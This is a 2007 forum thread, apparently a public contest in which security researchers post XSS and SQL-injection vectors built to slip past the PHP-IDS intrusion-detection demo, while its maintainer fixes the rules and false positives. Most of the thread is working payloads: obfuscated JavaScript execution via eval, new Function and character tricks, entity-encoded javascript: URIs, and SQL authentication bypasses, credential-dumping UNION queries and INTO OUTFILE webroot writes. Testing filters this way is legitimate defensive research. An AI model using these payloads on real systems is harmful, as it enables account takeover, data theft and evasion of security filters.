@.mario and christian: No worries... I know you guys appreciate the vectors, and I appreciate the recognition. I think it's good that you're staying focused on overall goals of the project. I just wanted to clarify that if at any point you feel like stopping this endless cycle, that's just fine with me.

s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

a lot of new stuff going on in that one gareth... cool!

...here's my first one using the xml tags... and also the shortest one i've found in a long time.

http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65%3C%2F%76%3E%74%69%6F%6E%2E%68%61%73%3C%76%3E%76%61%3C%2F%76%3E%68%2E%73%75%62%73%3C%76%3E%6C%3C%2F%76%3E%74%72%28%31%29%3C%2F%72%3E%0A%7B%62%3D%30%65%30%5B%61%2E%76%2E%74%65%78%74%28%29%0A%5D%7D%68%74%74%70%3D%27%27%3B%62%28%62%28%68%74%74%70%2B%61%2E%74%65%78%74%28%29%0A%29%29#alert%28%27XML%20w00t%27%29

a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))

Nice execution workaround :) 0e0

s=function test2() {return 'aalert(1)a';1,1}();
void(a = {} );
a.a1=function xyz() {return s[1] }();
a.a2=function xyz() {return s[2] }();
a.a3=function xyz() {return s[3] }();
a.a4=function xyz() {return s[4] }();
a.a5=function xyz() {return s[5] }();
a.a6=function xyz() {return s[6] }();
a.a7=function xyz() {return s[7] }();
a.a8=function xyz() {return s[8] }();
$=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7 +a.a8 }();
new Function($)();

Got another small and nice one:-
x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()

@all: Thanks a lot again. Will take care for them vectors soon!
@Reiners: I am looking forward for the SQLI contest. I see tons of possible injections there.

Meanwhile eat this:

x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

based on Gareths vector but a little bit simplified and more obfuscated...



Edited 1 time(s). Last edit at 09/18/2007 05:34AM by .mario.

Very nice :)

Even shorter :)

Function('a\x6cert(1)')();

.mario Wrote:
-------------------------------------------------------
> @Reiners: I am looking forward for the SQLI
> contest. I see tons of possible injections there.

Hi!
what do you mean with SQLi contest? Maybe I am not up to date ... :)

And there might be a problem with false positives ...
http://demo.php-ids.org/?test=Just%20in%20case%20this%20idea%20is%20not%20Reiners'%20or%20it%20is%20not%20mine
(bad english, but I'm sure there are some other phrases triggering false positives).
maybe you filter only for "or is not null", because thats the only phrase I know which is working with "or is not".



Edited 2 time(s). Last edit at 09/18/2007 11:26AM by Reiners.

This unicode attack is cool:-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

It didn't work (Score 13) but I thought it might inspire someone

@Reiners: Right now there definitely is! I added the string to the false DB database. Will take care of that soon! *fixed*



Edited 1 time(s). Last edit at 09/18/2007 01:54PM by .mario.

Where is the script tag? now try the hard stuff, including a full script tag. ^^

I'm just playing by the rules Ronald, I'll always take the easy option to save time. Although I might take up your challenge :)

Yeah would be cool I guess, I'm sure there is some crazy way for that also?

In opera :D

<body background=javascript&#58%20%20%20%20%20alert(1)

I haven't got IE to test

They've fixed it already :)

damn they're fast.

woohoo! cool stuff. I really thought they would block most starting html tags?

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself!

should this trigger the protection?

Hm, fixed already?

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself(again)

Triggers protection too. Once again: should it do this?



Edited 2 time(s). Last edit at 09/19/2007 12:55PM by Spyware.

&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29

s=new String;
e = /aeavaala/+s;
e = new String + e[ 2 ] + e[ 4 ] + e[ 5 ] + e[ 7 ];
a = /aablaecrdt(1)a/+s;
a = new String + a[ 2 ] + a[ 4 ] + a[ 6 ] + a[ 8 ] + a[ 10 ] + a[ 11 ] + a[ 12 ] + a[ 13 ],
e=new Date() [e];
e(a)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://demo.php-ids.org/?test=a'%20or%201='1
--> ?test=a' or 1='1

http://demo.php-ids.org/?test=asd'%20union%20(select%20username,password%20from%20admins)%20where%20id='1
--> ?test=asd' union (select username,password from admins) where id='1
edit: on MySQL this can only be used if the mainquery is in brackets () too.
Like "(SELECT ...) UNION (SELECT ...)"
But I guess it works on other DBMS, can somebody confirm that ?

also note, that the following chars can be used between "select[]username,password" on MySQL:
"+", "-", "!", "@", "~" (and of course all whitespaces).
This does not work between "union select", so right now PHP-IDS filters are fine with that ;) Anyways quite interesting for bypassing other filters imho.

false positive ?! ;)
http://demo.php-ids.org/?test=this%20annoys%20mario%20(its%20name%20is%20%22false%20positive%22)%20



Edited 2 time(s). Last edit at 09/20/2007 10:55AM by Reiners.

Hi!

Phew - those were some head nuts and it took me a while to solve them. The result: Four over-sized rules gone, several ones drastically optimized with conditional regex, many removed false alerts and the whole thing with even smaller rules - 24148 Bytes in the 0.4.0 release and now 23998 in the trunk ;)

Thanks a lot guys!

@Reiners: SQL Injection contest is coming in around '1 OR '2 weeks

Greetings,
.mario

potential authentication bypass: http://demo.php-ids.org/?test=admin%20'%20having%201%20%231%20%21

I'm not postive that

declare ,@a varchar;

is valid syntax so it may be a moot point (anyone got an answer for that? I can't test at the moment.)
but here's another: http://demo.php-ids.org/?test=%3Bdeclare%20%2C@a%20varchar%3Bbegin%20select%20@a%20%3D%20password%20from%20%27users%27%20limit%201%3B%20%20select%20@a%20as%20a%20into%20tbl_a%3B%20%20end%3B%20%231%20%21

EDIT: this false positive is dedicated to Michael Jordan: http://demo.php-ids.org/?test=I%27m%20watchin%27%20%2323%20from%20the%20bulls%20dunk%20on%20everybody%21

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/20/2007 04:04PM by tx.

Nice ones - the

declare ,@

really works? *fixxed*

Thx!
.mario

Damn your fast! :)

here's another: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21

EDIT: and another http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21

EDIT2: Only works for non multi-byte character sets, but still passes the smoketest: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 12:04AM by tx.

Hi! SQLi contest sounds fun, is there more information available yet?

Again I played with the "or" operator. Here are some examples which all work on MySQL and query with quotes:

//prefix
http://demo.php-ids.org/?test=asd'or-1='-1
--> ?test=asd'or-1='-1
--> ?test=asd'or!1='!1
--> ?test=asd'or!(1)='1
--> ?test=asd'or@1='@1
--> ?test=asd'or-1 XOR'0
...

//functions
http://demo.php-ids.org/?test=asd'%20or%20ascii(1)='49
--> ?test=asd' or ascii(1)='49
--> ?test=asd' or md5(1)^'1
...

//columns
http://demo.php-ids.org/?test=asd'%20or%20table.column^'1
--> ?test=asd' or table.column^'1

//system variables
http://demo.php-ids.org/?test=asd'%20or%20@@version^'0
--> ?test=asd' or @@version^'0
--> ?test=asd' or @@global.hot_cache.key_buffer_size^'1
...

//subquery
http://demo.php-ids.org/?test=asd'%20or!(select%20name%20from%20users%20limit%201)='1
--> ?test=asd' or!(select name from users limit 1)='1
("limit 1" to return only one row, "!(string)" always returns "1")

also works (they all return true somehow):
http://demo.php-ids.org/?test=1'OR!'a
--> ?test=1'OR!'a
--> ?test=1'OR!'0
--> ?test=1'OR-'1
--> ?test=1'OR@'1' IS NULL #1 ! (with unfiltered comment by tx ;)
--> ?test=1'OR!(false) #1 !
--> ?test=1'OR-(true) #a !

//other
http://demo.php-ids.org/?test=1'%20INTO%20OUTFILE%20'C:/webserver/www/readme.php
--> ?test=1' INTO OUTFILE 'C:/webserver/www/readme.php
(useful on blind sql injections in combination with a "or statement" from above)

enough spammed ;) I hope some are useful.
greetings, Reiners



Edited 10 time(s). Last edit at 09/20/2007 08:02PM by Reiners.

Hi - very cool ones. I am totally swamped in work right now so I will take care of them tomorrow. Thx guys!

<edit>I couldn't wait... all fixx0red :)</edit>



Edited 1 time(s). Last edit at 09/21/2007 11:30AM by .mario.

@mario: These three four auth bypasses are still getting through:

using id instead of username: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21

?test=' or id=1 having 1 #1 !

REGEXP matching admin name: http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21

?test=' or username REGEXP 'admi*' having 1 #1 !

SOUNDS LIKE : http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21

?test=' or username SOUNDS LIKE 'adnin' and 1 SOUNDS LIKE 1 #1 !

The comment rule (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*\(\s*\d) catches

?test=' #1 !

but can be evaded with

?test=' {some expression or text here} #{some alphanum} !

EDIT:
Another auth bypass using hex: http://demo.php-ids.org/?test=%27%20or%20username%3D0x61646D696E%3B%20%23a%20%21

?test=' or username=0x61646D696E; #a !

I've got some more for you as soon as I'm not under deadline anymore :\

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 04:09PM by tx.